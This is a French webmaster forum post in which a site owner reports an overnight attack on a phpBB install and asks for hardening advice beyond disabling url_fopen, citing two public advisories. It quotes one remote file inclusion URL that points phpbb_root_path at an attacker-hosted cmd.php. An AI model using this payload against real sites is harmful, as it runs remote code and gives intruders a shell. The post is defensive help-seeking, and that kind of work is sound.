WRInaute occasionnel
Salut
Bon, j'ai été attacké cette nuit donc je fais partager et les solutions de sécurité sont les bienvenues. Voila ce qui s'est passé (c'est déja documenté sur le net):
Documenté ici :
http://www.frsirt.com/english/advisories/2007/0451
ou ici:
http://secwatch.org/advisories/1015365/
Donc j'ai tourné url_fopen off dans php afin que cette vulnérabilité ne puisse etre utilisée. Ceci dit, ca me gene sur d'autres aspecs du site, donc toute solution de sécurisation serait la bienvenue...Par exemple checker la valeur retour et interdire si elle commence par http ?? Dans quels fichier ?
Merci d'avance des suggestions et correctifs...
Bon, j'ai été attacké cette nuit donc je fais partager et les solutions de sécurité sont les bienvenues. Voila ce qui s'est passé (c'est déja documenté sur le net):
Code:
Arbitrary File Inclusion:
http://[target]/includes/functions.php?phpbb_root_path=http://[attacker]/cmd.php
Documenté ici :
http://www.frsirt.com/english/advisories/2007/0451
ou ici:
http://secwatch.org/advisories/1015365/
Donc j'ai tourné url_fopen off dans php afin que cette vulnérabilité ne puisse etre utilisée. Ceci dit, ca me gene sur d'autres aspecs du site, donc toute solution de sécurisation serait la bienvenue...Par exemple checker la valeur retour et interdire si elle commence par http ?? Dans quels fichier ?
Merci d'avance des suggestions et correctifs...